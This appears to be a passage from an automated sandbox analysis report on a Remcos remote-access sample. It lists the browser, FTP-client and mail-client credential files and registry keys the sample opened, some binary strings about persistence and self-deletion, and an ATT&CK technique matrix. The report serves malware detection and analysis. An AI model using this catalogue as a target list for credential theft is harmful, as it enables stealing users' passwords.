                    Source: Yara match -- File source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match -- File source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match -- File source: 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match -- File source: 00000003.00000002.4505601069.00000000022FF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match -- File source: 00000003.00000002.4505309464.00000000004F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match -- File source: Process Memory Space: file.exe PID: 432, type: MEMORYSTR
                    Source: Yara match -- File source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe -- Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 11_2_00406447
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe -- Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 11_2_004065DB
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe -- Code function: \key3.db 11_2_004065DB
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\SharedSettings.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\SiteDesigner\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\CuteFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\FlashFXP\3\History.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\SharedSettings_1_0_5.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\SmartFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\RhinoSoft.com\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\SharedSettings.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: HKEY_CURRENT_USER\Software\TurboFTP
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\BitKinex\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\BlazeFtp\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBIT
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\LeapWare\LeapFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\GPSoftware\Directory Opus\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: HKEY_CURRENT_USER\Software\AceBIT
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\NetSarang\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\FTPInfo\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.ini
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\FileZilla\filezilla.xml
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\BitKinex\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\RhinoSoft.com\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\SharedSettings_1_0_5.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Program Files (x86)\CuteFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\SharedSettings.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\GHISLER\wcx_ftp.ini
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\FileZilla\recentservers.xml
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\BlazeFtp\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.js
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\BitKinex\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\FlashFXP\4\Sites.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\SmartFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\INSoftware\NovaFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\FTP Explorer\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\FTPGetter\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Program Files (x86)\CuteFTP\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\FTPInfo\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xml
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\FTP Explorer\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\CuteFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTP
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\SmartFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\CuteFTP\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\Frigate3\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\Setup
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\FileZilla\sitemanager.xml
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\TurboFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\Frigate3\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\FTPRush\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\FTPGetter\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\FlashFXP\3\Quick.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\Estsoft\ALFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\FTPRush\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\ExpanDrive\drives.js
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\ExpanDrive\drives.js
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\CuteFTP\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\TurboFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\AceBIT\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\TurboFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\BlazeFtp\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\SharedSettings.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\FlashFXP\3\Sites.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xml
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\SharedSettings.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\AceBIT\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\AceBIT\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\SharedSettings.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Windows\32BitFtp.ini
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\FTPGetter\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\wcx_ftp.ini
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\FlashFXP\4\Quick.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\NetSarang\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\3D-FTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\FTP Explorer\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\NetSarang\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xml
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\FTPRush\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\FlashFXP\4\History.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\FlashFXP\3\History.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\CuteFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\FTPInfo\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: HKEY_LOCAL_MACHINE\Software\TurboFTP
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\FlashFXP\4\History.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Local\Frigate3\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Windows\wcx_ftp.ini
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe -- File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword5_2_0040EBA3
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword5_2_0040EBA3

                    Remote Access Functionality

                    Source: file.exe | String found in binary or memory: Remcos_Mutex_Inj
                    Source: file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp | String found in binary or memory: Remcos_Mutex_Inj
                    Source: file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp | String found in binary or memory: \uninstall.vbsEXEpathUserinitC:\WINDOWS\system32\userinit.exeShellexplorer.exeSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsUserProfileAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS
                    Source: file.exe, 0000000B.00000002.2305053551.00000000006D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Remcos_Mutex_InjDOM^
                    Source: Yara match | File source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR
                    Source: Yara match | File source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.4505601069.00000000022FF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.4505309464.00000000004F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: file.exe PID: 432, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: cmd.exe | 11_2_00402AAD
                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                    Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                    Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                    Execution: 2 Native API; 1 Command and Scripting Interpreter; 2 Service Execution; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                    Persistence: 1 Scripting; 1 DLL Side-Loading; 1 Valid Accounts; 1 Windows Service; 12 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                    Privilege Escalation: 1 DLL Side-Loading; 1 Valid Accounts; 11 Access Token Manipulation; 1 Windows Service; 222 Process Injection; 12 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At; Cron
                    Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Install Root Certificate; 1 DLL Side-Loading; 1 Masquerading; 1 Valid Accounts; 21 Virtualization/Sandbox Evasion; 11 Access Token Manipulation; 222 Process Injection; Dynamic API Resolution
                    Credential Access: 3 OS Credential Dumping; 211 Input Capture; 2 Credentials in Registry; 2 Credentials In Files; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                    Discovery: 1 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 4 File and Directory Discovery; 35 System Information Discovery; 21 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
